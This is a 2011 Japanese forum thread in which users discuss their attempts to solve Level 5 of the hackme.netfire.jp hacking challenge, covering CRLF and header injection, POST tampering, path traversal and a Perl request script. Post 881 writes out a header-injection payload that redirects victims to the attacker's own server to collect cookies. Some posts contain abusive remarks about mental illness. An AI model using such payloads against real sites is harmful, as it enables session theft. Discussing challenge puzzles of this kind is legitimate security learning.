827 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:26:25.27
俺も北海道の大学にいけばLv5をクリア出来るかな?
828 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:27:09.52
北見工業いてら
829 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:33:54.99
830 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:53:42.39
GETはスルーしてんじゃねーの?
831 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:54:03.10
レベル低すぎワロタ
ここ本当にセキュ板かよwwww
ここ本当にセキュ板かよwwww
832 :名無しさん@お腹いっぱい。:2011/02/28(月) 18:55:07.01
煽って情報引き出すなんてのを未だにやってる奴がいるんだなw
833 :名無しさん@お腹いっぱい。:2011/02/28(月) 19:01:42.46
引き出そうなんて思えるレベルですらないだろw
GETのパラメータすら理解してねえじゃねえかww
GETのパラメータすら理解してねえじゃねえかww
834 :名無しさん@お腹いっぱい。:2011/02/28(月) 19:19:54.75
パラメータって何?
835 :名無しさん@お腹いっぱい。:2011/02/28(月) 19:21:23.77
そういえば、朝にPostもまともに出来ない奴が居たな・・・
836 :名無しさん@お腹いっぱい。:2011/02/28(月) 19:47:29.79
ログインうんぬんに関係ないページで挙動不審なところがあるんだが、Lv5クリアするには関係ないよな
837 :名無しさん@お腹いっぱい。:2011/02/28(月) 19:50:03.39
838 :名無しさん@お腹いっぱい。:2011/02/28(月) 19:51:25.67
どのページ?
839 :名無しさん@お腹いっぱい。:2011/02/28(月) 21:35:50.42
ところでLv4のハッシュって何?
MD5じゃないよね?
これが解読できればLv5のヒントになってたりしない?
MD5じゃないよね?
これが解読できればLv5のヒントになってたりしない?
840 :名無しさん@お腹いっぱい。:2011/02/28(月) 21:37:38.94
MD5だよ
841 :名無しさん@お腹いっぱい。:2011/02/28(月) 21:38:08.76
最近のゆとりセキュ民は不可逆という言葉もしらんのかいな…
842 :名無しさん@お腹いっぱい。:2011/02/28(月) 21:38:17.46
>>840
逆変換したら何になる?
逆変換したら何になる?
843 :名無しさん@お腹いっぱい。:2011/02/28(月) 21:38:43.15
ハッシュも知らないとはセキュ板も落ちたもんだな・・・
844 :名無しさん@お腹いっぱい。:2011/02/28(月) 21:39:52.42
ここセキュリティ板って言うの?今知ったよ
845 :名無しさん@お腹いっぱい。:2011/02/28(月) 21:44:22.28
846 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:09:39.89
847 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:13:26.03
LV5をどこから攻めていいのかまったくわからん。
HTTPヘッダインジェクションを試してみてるんだが、全然だめ。
どうすりゃいいんだ…
HTTPヘッダインジェクションを試してみてるんだが、全然だめ。
どうすりゃいいんだ…
848 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:25:25.99
あれ?Lv4って1度解くと再挑戦できない?
849 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:26:16.87
0x00〜0xFFまでのデータを一つずつ0xFF回送信 → 意味なし
リクエストヘッダにも同様のことを0xFF回送信 → 意味なし
巨大なデータ送信 → 意味なし
リクエストヘッダにも同様のことを0xFF回送信 → 意味なし
巨大なデータ送信 → 意味なし
850 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:26:31.95
クリアするためにやった手順を戻せば再挑戦できるよ
851 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:28:04.72
852 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:35:00.51
適当にしてたらMissing valueって出てきた
853 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:36:01.01
854 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:39:44.73
フォームのIDに「k」って入力したら「koratta」って自動補完が出てきた
同じく「i」って入力したら「I-bui」って自動補完が出てきた
俺ポケモンの名前なんて入力した覚えないんだけど。
同じ現象の人いる?
同じく「i」って入力したら「I-bui」って自動補完が出てきた
俺ポケモンの名前なんて入力した覚えないんだけど。
同じ現象の人いる?
855 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:43:21.75
>>854
しるかw
しるかw
856 :名無しさん@お腹いっぱい。:2011/02/28(月) 22:44:33.37
GoogleIME?
857 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:02:55.61
method=getにしたら英数字とか_の制限が外れた。
これ使えんのか?
これ使えんのか?
858 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:08:34.01
無視されるだけ〜
859 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:08:42.11
>>857
「制限が外れた」ってただgetが無視されてるだけじゃなくて?
「制限が外れた」ってただgetが無視されてるだけじゃなくて?
860 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:10:53.13
861 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:14:47.15
改行コードCRLFをpostでぶち込むと弾かれず、改行コードとして評価される。
(ソースを開くと空白の改行が入ってくれる)
これは穴みっけたか?
(ソースを開くと空白の改行が入ってくれる)
これは穴みっけたか?
862 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:18:19.82
863 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:31:23.66
ほんとだ
タブやスペースははじかれるのに改行は通る
タブやスペースははじかれるのに改行は通る
864 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:34:30.21
865 :861:2011/02/28(月) 23:39:28.82
866 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:40:52.39
867 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:42:49.88
やってみてもソースが改行されねえ
868 :861:2011/02/28(月) 23:45:31.84
マルチバイト文字の脆弱性でダブルクオートを食わせるのも試みたけど、
そこもちゃんと対策してあるみたい(あるいは俺のやり方が足らないのか)。
文字コード周りが匂うけどなぁ
そこもちゃんと対策してあるみたい(あるいは俺のやり方が足らないのか)。
文字コード周りが匂うけどなぁ
869 :861:2011/02/28(月) 23:49:26.09
>>866
フォームのバリデーションは先人が言うようにFormEncodeを使ってて、
色々試してみた結果、少なくともLv3,Lv4でも同じようにFormEncode使ってるよな。
だからやっぱりフォーム周りの脆弱性を穿り回しても何も出てこなさそう。
フォームのバリデーションは先人が言うようにFormEncodeを使ってて、
色々試してみた結果、少なくともLv3,Lv4でも同じようにFormEncode使ってるよな。
だからやっぱりフォーム周りの脆弱性を穿り回しても何も出てこなさそう。
870 :861:2011/02/28(月) 23:49:55.50
結局一番くさいのは
Lv5/login
Lv5/login/
ここしかないというw
Lv5/login
Lv5/login/
ここしかないというw
だめだもう一回やってみたら
英数字と下線(_)だけ入力できます
が普通に出てきた
英数字と下線(_)だけ入力できます
が普通に出てきた
872 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:50:27.17
やる気あんの?
873 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:51:20.96
あぁん?
874 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:53:03.79
HTMLヘッダインジェクションは、結構こだわってる人いたから
一通りは試されてそう。
ま、正解が文字列完全一致しないとダメとかだと可能性は残っちゃうけど
一通りは試されてそう。
ま、正解が文字列完全一致しないとダメとかだと可能性は残っちゃうけど
875 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:55:19.34
かれこれ3時間ぐらい使ったわ…
/←これの有無で何が変わるか。
わかんね
/←これの有無で何が変わるか。
わかんね
876 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:58:47.61
.login/../にするとLv1に飛ばされる
877 :名無しさん@お腹いっぱい。:2011/02/28(月) 23:59:05.07
GETは無視されてるっぽいし
/付きにPOSTしてみたけど何にも変わらないな
/付きにPOSTしてみたけど何にも変わらないな
878 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:01:43.09
879 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:02:11.57
880 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:02:20.13
lv5名前が掲載されるまでyaz_kのフォロワーにdotdisterがいたのに、
lv5名前が掲載されたらdotdisterがyaz_kフォロワー外れたみたいだけど
なんか意味あんの?
lv5名前が掲載されたらdotdisterがyaz_kフォロワー外れたみたいだけど
なんか意味あんの?
881 :861:2011/03/01(火) 00:05:06.20
>>874
多分試されてるだろうな。
それにヘッダインジェクションと言ってもSet-Cookieさせても意味ないし、
現実的なのはLocationで自鯖のどっかに飛ばすとかだから
%0d%0aLocation%3A%20http://{自分のIP}/cookie.cgi
的な書き方ぐらいしか思いつかん。
多分試されてるだろうな。
それにヘッダインジェクションと言ってもSet-Cookieさせても意味ないし、
現実的なのはLocationで自鯖のどっかに飛ばすとかだから
%0d%0aLocation%3A%20http://{自分のIP}/cookie.cgi
的な書き方ぐらいしか思いつかん。
882 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:06:46.26
883 :861:2011/03/01(火) 00:08:44.16
>>876
>>878
ディレクトリ一個登ってるだけだよ。
hackme.netfire.jp/Lv5/login/../ → hackme.netfire.jp/Lv5/
hackme.netfire.jp/Lv5/../ → hackme.netfire.jp/ →(リダイレクト)→ hackme.netfire.jp/Lv1/
他のサイトでもやってみ、大体上手くいく
>>878
ディレクトリ一個登ってるだけだよ。
hackme.netfire.jp/Lv5/login/../ → hackme.netfire.jp/Lv5/
hackme.netfire.jp/Lv5/../ → hackme.netfire.jp/ →(リダイレクト)→ hackme.netfire.jp/Lv1/
他のサイトでもやってみ、大体上手くいく
884 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:09:36.56
885 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:14:47.18
886 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:15:32.23
887 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:17:08.26
>>884
DMで送ったんだろw
DMで送ったんだろw
888 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:24:17.02
dotdister様が意味深なコメントを発せられたぞー
889 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:34:49.05
890 :861:2011/03/01(火) 00:36:02.70
UserAgentをiPhoneに変えたら、iPhone用のコードがヘッダーに入った
(CSSとJavascript)。
他Lvでも同じ挙動するから多分関係ないけど、どきっとした
(CSSとJavascript)。
他Lvでも同じ挙動するから多分関係ないけど、どきっとした
891 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:38:05.04
ネットストーカー対策どうすればいい?
892 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:38:58.57
繋がない
893 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:40:10.66
894 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:41:13.75
ネットストーカーができるのはだいたいどういうレベル?
895 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:43:05.65
>>894
ターゲットが統合失調症なら誰でもできる
ターゲットが統合失調症なら誰でもできる
896 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:44:34.64
技術的なことがわかるひとお答えください
897 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:45:05.03
>>896
技術者じゃなくて病院にいけよ糖質基地外
技術者じゃなくて病院にいけよ糖質基地外
898 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:45:23.00
何について技術的なんだろうな
899 :名無しさん@お腹いっぱい。:2011/03/01(火) 00:52:53.09
そもそもスレチだしなw
900 :名無しさん@お腹いっぱい。:2011/03/01(火) 01:31:03.58
POSTで送るデータをどうかする所は可能性高いと思うんだけどなぁ。他のレベルじゃでないエラーがでるんだから。
901 :名無しさん@お腹いっぱい。:2011/03/01(火) 01:38:32.51
902 :名無しさん@お腹いっぱい。:2011/03/01(火) 01:38:44.97
北海道の情報系と言ったら
- 北海道大学
- 北見工業大学
- 室蘭工業大学
- 北海学園大学
- 北海道東海大学
- 北海道情報大学
ぐらいか。
北海道大学以外は(ry
- 北海道大学
- 北見工業大学
- 室蘭工業大学
- 北海学園大学
- 北海道東海大学
- 北海道情報大学
ぐらいか。
北海道大学以外は(ry
903 :名無しさん@お腹いっぱい。:2011/03/01(火) 01:45:36.03
何日間か見てて思うんだけど、この板レベル高い人ってかなり少ない気がする・・・自分も低いけどそれでも「え?」っていうコメント多すぎる・・・
904 :名無しさん@お腹いっぱい。:2011/03/01(火) 01:54:21.54
あきらかに別のところから難民が流れてきてる
前スレもなんやらハッカーになりたい中学生とかいたし
前スレもなんやらハッカーになりたい中学生とかいたし
905 :名無しさん@お腹いっぱい。:2011/03/01(火) 01:56:41.35
あれだろ、ハム速とかの影響で流れてくる奴が居るんじゃね?
906 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:02:35.29
セキュ板民はソーシャルハックをはじめたようです
907 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:04:36.37
俺のことだな。セキュ板なんて、アンチウィルスソフトの事調べるくらいしかこないし
908 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:05:04.06
そうか・・・中学生だろうがすごいのはすごい。自分はCSメインとはいえSEでメシくってるのに大学生に負けてるのは悲しいな・・・
909 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:06:40.56
このスレのレベルの低さは
情報が重複するところからも見てとれるな
情報が重複するところからも見てとれるな
910 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:19:57.21
<type 'list'>〜 ってXMLロード時のエラー?ここから掘っていけないのかな?
911 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:22:10.08
不正文字入力でフォームにログインIDがでる→何とかしてタグ破壊をしたい!
という流れが割りと見受けられるが、いざ破壊できたとしてもどうにもならないとは思わないかね。
という流れが割りと見受けられるが、いざ破壊できたとしてもどうにもならないとは思わないかね。
912 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:25:21.30
913 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:27:27.01
じゃあ、破壊したとして、任意のスクリプトが動作させられる状態にしたとして、
それを他のユーザにどうやって見せるの?
それを他のユーザにどうやって見せるの?
914 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:31:21.94
915 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:33:12.26
んで、フォーム周りで出来ることとしては、
任意の項目/値を送ることが出来るわけだけど、
既知の項目については十分にエンティティ化されている→知ってる範囲では、何も出来そうにない
不正な項目については、不正な項目であることが検証によって出力される
→サーバサイドですべての項目名を見ていると思っていい
→項目名に細工をすることで、サーバ側で任意のコードを実行させることは出来ないか?
任意の項目/値を送ることが出来るわけだけど、
既知の項目については十分にエンティティ化されている→知ってる範囲では、何も出来そうにない
不正な項目については、不正な項目であることが検証によって出力される
→サーバサイドですべての項目名を見ていると思っていい
→項目名に細工をすることで、サーバ側で任意のコードを実行させることは出来ないか?
916 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:41:21.13
Lv2から、サーバアプリの言語をphpと想定するならば、
項目名を利用して誤動作を起こさせるためには、
・register_globalsが有効になっている
・いずれかの箇所で項目名をevalする場面がある
あたりがすぐ思いつくわけだけど、後者はありそうもない(かといって、ないと断言できないのは他のレベルの状況から想像がつく)
register_globalsが有効になっているとして、じゃあどのような項目をほうりこむか、となるんだけど、
任意の項目名をPOSTしまくってる人は結構いそうなんだよね。
となると、上記の線は消えるのだろうか…?←イマココ
項目名を利用して誤動作を起こさせるためには、
・register_globalsが有効になっている
・いずれかの箇所で項目名をevalする場面がある
あたりがすぐ思いつくわけだけど、後者はありそうもない(かといって、ないと断言できないのは他のレベルの状況から想像がつく)
register_globalsが有効になっているとして、じゃあどのような項目をほうりこむか、となるんだけど、
任意の項目名をPOSTしまくってる人は結構いそうなんだよね。
となると、上記の線は消えるのだろうか…?←イマココ
917 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:43:13.72
>>915
それってPOSTするデータをいじるってことかな?
それってPOSTするデータをいじるってことかな?
918 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:48:59.18
>>916
phpはよくわからないけど、POSTDATAの内容次第で出るエラーに関しては他のレベルと違うものがでるのは明らか。そこを掘り下げるのが可能性が高いとは思う。ただ、それ以降がまったく(笑
phpはよくわからないけど、POSTDATAの内容次第で出るエラーに関しては他のレベルと違うものがでるのは明らか。そこを掘り下げるのが可能性が高いとは思う。ただ、それ以降がまったく(笑
919 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:54:21.92
フレームワークの脆弱性とかを地道に試してみるとか・・・
920 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:57:41.45
オレよりレベルが高い人なんてクソみたいにいると思ってるのにー!そんなにこのスレ注目されてないの?
921 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:57:47.15
フレームワークの予想とかでてたっけ
922 :名無しさん@お腹いっぱい。:2011/03/01(火) 02:58:30.23
まずは>>920の想定している内容をさらしてみようぜ
923 :名無しさん@お腹いっぱい。:2011/03/01(火) 03:06:53.15
>>922
ごめん、本当オレWeb系くわしくないし、クリアする道筋もない・・・
使ってるルールはTamper Data。
このスレでも書かれているようにブラウザから「;」はは受け付けないけど、このルールつかってPOSTすると変なエラーがでる。
他のレベルじゃ同じ結果にならないから、そこにクリアのきっかけがあるように思うんだけど、それ以降はアイデアなし・・・
ごめん、本当オレWeb系くわしくないし、クリアする道筋もない・・・
使ってるルールはTamper Data。
このスレでも書かれているようにブラウザから「;」はは受け付けないけど、このルールつかってPOSTすると変なエラーがでる。
他のレベルじゃ同じ結果にならないから、そこにクリアのきっかけがあるように思うんだけど、それ以降はアイデアなし・・・
924 :名無しさん@お腹いっぱい。:2011/03/01(火) 03:07:53.82
まちがえたルールじゃなくてツール
925 :名無しさん@お腹いっぱい。:2011/03/01(火) 03:12:16.94
もちろんGETだと全部無視される気がする
926 :名無しさん@お腹いっぱい。:2011/03/01(火) 03:38:21.25
927 :名無しさん@お腹いっぱい。:2011/03/01(火) 03:44:59.11
そなんだ?
pg_queryでてっきりPHP想定かと
pg_queryでてっきりPHP想定かと
928 :名無しさん@お腹いっぱい。:2011/03/01(火) 03:50:10.29
サイト自体の実装はpythonでphpをエミュレーションしているがバグがありpylonsのエラーが吐かれるという糞仕様
929 :名無しさん@お腹いっぱい。:2011/03/01(火) 09:18:15.73
何よりまだ2スレ目なのが問題でな
お前らそろそろやる気見せてもいいんじゃないか?
お前らそろそろやる気見せてもいいんじゃないか?
930 :名無しさん@お腹いっぱい。:2011/03/01(火) 09:24:45.89
そういえばWebブラウザーだと記号類は自動的にURLエスケープされたのが送信されるんだっけ。
ブラウザー使っている限り、記号類は1文字も送れてないな。
無駄な努力を3日も4日もしてた奴いるんじゃないか?
ブラウザー使っている限り、記号類は1文字も送れてないな。
無駄な努力を3日も4日もしてた奴いるんじゃないか?
931 :名無しさん@お腹いっぱい。:2011/03/01(火) 09:50:27.43
数万人挑戦して唯一解けた人が
「中の人の意図がわからない」
とか言ってる問題やりたくなくなってきたな。
正解わかったら怒り狂ったエロイ人達が
ガチでnetfireに攻撃するんじゃw
「中の人の意図がわからない」
とか言ってる問題やりたくなくなってきたな。
正解わかったら怒り狂ったエロイ人達が
ガチでnetfireに攻撃するんじゃw
932 :名無しさん@お腹いっぱい。:2011/03/01(火) 10:21:32.66
十数万人挑戦というが、実際は垢の数=人数じゃないからな
これで9割水増し状態だったら笑える
これで9割水増し状態だったら笑える
933 :名無しさん@お腹いっぱい。:2011/03/01(火) 11:01:05.06
934 :名無しさん@お腹いっぱい。:2011/03/01(火) 11:08:11.81
Firefox拡張をいちいち操作するのが面倒な人向け。
Perlだよ。
use LWP::UserAgent;
use HTTP::Request::Common;
use Smart::Comments;
{
my $ua = new LWP::UserAgent;
$ua->timeout(2);
$ua->default_headers->header(
'Content-Type' => 'multipart/form-data',
'Cookie' => 'sessionid=x23de645f27d4641f618e6eff3ccae4cfdefec4d1dcef21201afcc693fd0b4ae1d8566ad;',
);
### $ua:$ua
my $res = $ua->request(POST 'http://hackme.netfire.jp/Lv5/login', Content => 'name=NAME&password=PASS');
### $res:$res
}
Perlだよ。
use LWP::UserAgent;
use HTTP::Request::Common;
use Smart::Comments;
{
my $ua = new LWP::UserAgent;
$ua->timeout(2);
$ua->default_headers->header(
'Content-Type' => 'multipart/form-data',
'Cookie' => 'sessionid=x23de645f27d4641f618e6eff3ccae4cfdefec4d1dcef21201afcc693fd0b4ae1d8566ad;',
);
### $ua:$ua
my $res = $ua->request(POST 'http://hackme.netfire.jp/Lv5/login', Content => 'name=NAME&password=PASS');
### $res:$res
}
935 :名無しさん@お腹いっぱい。:2011/03/01(火) 11:11:17.33
うわぁ
セッションが…
セッションが…
おっとmultipart/form-dataじゃなかったな。
Content-Typeの設定は外して使ってね。そこデフォルトでいいから。
Content-Typeの設定は外して使ってね。そこデフォルトでいいから。
937 :名無しさん@お腹いっぱい。:2011/03/01(火) 11:15:10.09
934のアカウントをハックしろと言うのか
938 :名無しさん@お腹いっぱい。:2011/03/01(火) 11:15:24.42
まさにhackmeだなw
939 :名無しさん@お腹いっぱい。:2011/03/01(火) 11:19:41.47
SessionIDダダ漏れwクソ吹いたwww
940 :名無しさん@お腹いっぱい。:2011/03/01(火) 11:19:42.16
そろそろ無効なアカウント破棄するってね
941 :名無しさん@お腹いっぱい。:2011/03/01(火) 11:23:19.87
942 :名無しさん@お腹いっぱい。:2011/03/01(火) 12:18:24.55
次スレは必要ないよな
943 :名無しさん@お腹いっぱい。:2011/03/01(火) 13:18:07.04
とりあえずわかった事
POST絡みでどうこうするパターンはほぼ100%ない
1byteチェックで不正な文字列は全てはじかれるので
インジェクションやトラバーサル系が出来ない
ちなみに面白い動きとして
name=;password=test%password=;name=123
等とすると
nameにみたいなのが入り[u'', u'test']
passwordに[u'', u'123']が入る
name=;password;name;password;password;とチェインする事も可能
でも結局byteチェックされてるのでこれ以上はどうこうしても意味がない
そう言うわけでPOSTこねくり回すのは無駄という結論になりましたとさ
POST絡みでどうこうするパターンはほぼ100%ない
1byteチェックで不正な文字列は全てはじかれるので
インジェクションやトラバーサル系が出来ない
ちなみに面白い動きとして
name=;password=test%password=;name=123
等とすると
nameにみたいなのが入り[u'', u'test']
passwordに[u'', u'123']が入る
name=;password;name;password;password;とチェインする事も可能
でも結局byteチェックされてるのでこれ以上はどうこうしても意味がない
そう言うわけでPOSTこねくり回すのは無駄という結論になりましたとさ
944 :名無しさん@お腹いっぱい。:2011/03/01(火) 13:19:34.53
×name=;password=test%password=;name=123
○name=;password=test&password=;name=123
○name=;password=test&password=;name=123
945 :名無しさん@お腹いっぱい。:2011/03/01(火) 13:24:27.47
Lv4みたいに正解の文字列だけは
byteチェックされずに通るって仕様は・・・無いよね?
byteチェックされずに通るって仕様は・・・無いよね?
946 :名無しさん@お腹いっぱい。:2011/03/01(火) 13:46:32.90
Lv4は正解以外だと変化として空タグが残ってたからそれはないと思う
947 :名無しさん@お腹いっぱい。:2011/03/01(火) 14:33:09.14
948 :名無しさん@お腹いっぱい。:2011/03/01(火) 14:43:18.64
>>768
それ前スレの「該当者」と「なし」と同じネタじゃねーのw
それ前スレの「該当者」と「なし」と同じネタじゃねーのw
949 :名無しさん@お腹いっぱい。:2011/03/01(火) 14:54:28.14
950 :名無しさん@お腹いっぱい。:2011/03/01(火) 15:00:28.68
yaz_k=dotdisterだろ。
どうみても。
どうみても。
951 :名無しさん@お腹いっぱい。:2011/03/01(火) 15:10:52.58
>>949
うん。
うん。
952 :名無しさん@お腹いっぱい。:2011/03/01(火) 15:21:33.78
>>943
文字はUTF-8化されて、バイト単位ではなく文字単位(1〜3バイト)で評価されると思っていたんだが。
文字はUTF-8化されて、バイト単位ではなく文字単位(1〜3バイト)で評価されると思っていたんだが。
953 :名無しさん@お腹いっぱい。:2011/03/01(火) 15:24:40.59
>>949 の脆弱性をついたらこんなことに!誰かパッチを
954 :名無しさん@お腹いっぱい。:2011/03/01(火) 15:28:41.30
955 :名無しさん@お腹いっぱい。:2011/03/01(火) 16:25:23.05
>>949
yaz_kとdotdisterがリアフレの線も捨てきれないんじゃね?
dotdisterが疑われるの嫌ってyaz_k名前掲載直後に
リムったとかならまー多少挙動不審だけど
普通の神経持ってるやつなら自然な行動かなとか。
yaz_kとdotdisterがリアフレの線も捨てきれないんじゃね?
dotdisterが疑われるの嫌ってyaz_k名前掲載直後に
リムったとかならまー多少挙動不審だけど
普通の神経持ってるやつなら自然な行動かなとか。
956 :名無しさん@お腹いっぱい。:2011/03/01(火) 17:37:44.10
俺もヒント言っちまったんだろうと思うな。
実質まだ一人だな。
実質まだ一人だな。
957 :名無しさん@お腹いっぱい。:2011/03/01(火) 18:08:33.85
958 :名無しさん@お腹いっぱい。:2011/03/01(火) 18:41:29.95
アレだな、lv5って・・・脆弱性よりオナパス的な何かな気がしてきた
959 :名無しさん@お腹いっぱい。:2011/03/01(火) 18:43:18.25
ID 0721
pw 0721
pw 0721
960 :名無しさん@お腹いっぱい。:2011/03/01(火) 18:54:30.43
961 :名無しさん@お腹いっぱい。:2011/03/01(火) 18:58:38.30
最後は基本中の基本,堂々のソーシャル・エンジニアリングでした!おめでとう
というオチは勘弁
というオチは勘弁
962 :名無しさん@お腹いっぱい。:2011/03/01(火) 19:04:37.82
結局答えはなんなんだろうなぁ
get/postクエリは駄目
分割攻撃はgoogleがカット
この二つ塞がれたらもう殆どやる事がなくなるんだが
get/postクエリは駄目
分割攻撃はgoogleがカット
この二つ塞がれたらもう殆どやる事がなくなるんだが
963 :名無しさん@お腹いっぱい。:2011/03/01(火) 19:05:19.04
ついさっきあったバージョンアップの詳細を!
急いで!
急いで!
964 :名無しさん@お腹いっぱい。:2011/03/01(火) 19:08:51.86
965 :名無しさん@お腹いっぱい。:2011/03/01(火) 19:15:35.80
可哀相・・・
966 :名無しさん@お腹いっぱい。:2011/03/01(火) 19:53:24.55
そりゃ中の人も「自分で考えない馬鹿が増えた」って嘆くわw
967 :名無しさん@お腹いっぱい。:2011/03/01(火) 19:55:04.74
カンニングでLV5クリアw
968 :名無しさん@お腹いっぱい。:2011/03/01(火) 20:06:34.11
ソーシャルカンニングの真髄ここに極まれり
969 :名無しさん@お腹いっぱい。:2011/03/01(火) 20:17:15.03
カンニングで京大合格w
970 :名無しさん@お腹いっぱい。:2011/03/01(火) 22:05:52.06
誰だよ知恵袋に質問したのはw
971 :名無しさん@お腹いっぱい。:2011/03/01(火) 22:12:36.98
972 :名無しさん@お腹いっぱい。:2011/03/01(火) 22:13:40.04
973 :名無しさん@お腹いっぱい。:2011/03/01(火) 22:17:50.15
974 :名無しさん@お腹いっぱい。:2011/03/01(火) 22:31:25.32
もう俺は諦めた
CTF系の閃きハック系だろうし
それをオンラインでやれとか言われても萎えるだけ
CTF系の閃きハック系だろうし
それをオンラインでやれとか言われても萎えるだけ
975 :名無しさん@お腹いっぱい。:2011/03/01(火) 22:51:35.24
俺なんかLv1〜5まで
全部前スレに書いてあったことを実行しただけだぞ?
全部前スレに書いてあったことを実行しただけだぞ?
976 :名無しさん@お腹いっぱい。:2011/03/01(火) 23:23:51.89
ちょい前の大学院生とかもだけど、解くための過程と思考が楽しいのにカンぺモロ見で楽しいか?
977 :名無しさん@お腹いっぱい。:2011/03/01(火) 23:30:50.09
高木さんは関連会社の技術顧問だから。
978 :名無しさん@お腹いっぱい。:2011/03/01(火) 23:35:16.17
>>976
その思考をするために必要な知識が全くないから自力で解けないので答え見て感心する方が楽しい
その思考をするために必要な知識が全くないから自力で解けないので答え見て感心する方が楽しい
979 :名無しさん@お腹いっぱい。:2011/03/01(火) 23:48:41.97
980 :名無しさん@お腹いっぱい。:2011/03/01(火) 23:51:55.87
調べるの面倒だから、答えを人に聞く方が早いってかw
981 :名無しさん@お腹いっぱい。:2011/03/02(水) 00:32:30.12
982 :名無しさん@お腹いっぱい。:2011/03/02(水) 01:09:05.03
Lv5はhttpリクエスト色々試したけどわからん。
他のサービスの脆弱性をつくってのはナシなの?
ポートスキャンした人いる?
他のサービスの脆弱性をつくってのはナシなの?
ポートスキャンした人いる?
983 :名無しさん@お腹いっぱい。:2011/03/02(水) 01:09:22.00
(????)僕と契約すればLv5ぐらい解くことができるよ
984 :名無しさん@お腹いっぱい。:2011/03/02(水) 01:36:21.17
985 :名無しさん@お腹いっぱい。:2011/03/02(水) 01:45:30.65
>>984
GAEだってこと忘れてた。ありがと。
GAEだってこと忘れてた。ありがと。
986 :名無しさん@お腹いっぱい。:2011/03/02(水) 01:56:45.45
ここにヒントがある可能性があるぞ
http://www.ipa.go.jp/security/index.html
http://www.ipa.go.jp/security/index.html
987 :名無しさん@お腹いっぱい。:2011/03/02(水) 02:00:27.67
>>976
ちょうどいい難易度が一番おもしろいんだよ。
難易度が高すぎても低すぎてもつまらない。
俺の場合Lv3までは自力Lv4は半分チートが、
ちょうどいい難易度だっただけの話。
Lv5も今のままでは難易度高すぎてつまらないので、
さっさとヒント欲しい。モロバレは欲しくない。
ちょうどいい難易度が一番おもしろいんだよ。
難易度が高すぎても低すぎてもつまらない。
俺の場合Lv3までは自力Lv4は半分チートが、
ちょうどいい難易度だっただけの話。
Lv5も今のままでは難易度高すぎてつまらないので、
さっさとヒント欲しい。モロバレは欲しくない。
988 :名無しさん@お腹いっぱい。:2011/03/02(水) 05:42:22.07
Lv4って正直Lv3より簡単だと思うんだが
XSSって猿でも理解できるし
単にどう再現してるかって疑問だけ
XSSって猿でも理解できるし
単にどう再現してるかって疑問だけ
989 :名無しさん@お腹いっぱい。:2011/03/02(水) 05:53:51.50
正規表現でチェックしてるだけだろ
疑問にもならん
疑問にもならん
990 :名無しさん@お腹いっぱい。:2011/03/02(水) 07:42:21.71
yaz_kのフォロワーにdotdisterが回復してるな。
しかもreply飛ばし合ってる。
しかもreply飛ばし合ってる。
991 :名無しさん@お腹いっぱい。:2011/03/02(水) 08:16:01.97
八方塞がりなんでとりあえず意見を言い合おう
まずセッションを盗む系は無い
つまりxssは無い
理由は共用ページがないから
インジェクション関係も無い
getによる入力はどうかしらんが
少なくともpostの挙動を見る限りない
キャッシュ汚染系もない
そもそもgaeでその辺は管理してるので管轄外
と、ここまでもう結論づけていい?
反論あったらよろしこ
まずセッションを盗む系は無い
つまりxssは無い
理由は共用ページがないから
